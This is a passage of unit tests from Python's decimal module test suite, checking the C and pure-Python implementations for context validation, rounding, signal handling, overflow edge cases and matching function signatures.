checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
# Issue 41540:
@unittest.skipIf(sys.platform.startswith("aix"),
"AIX: default ulimit: test is flaky because of extreme over-allocation")
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
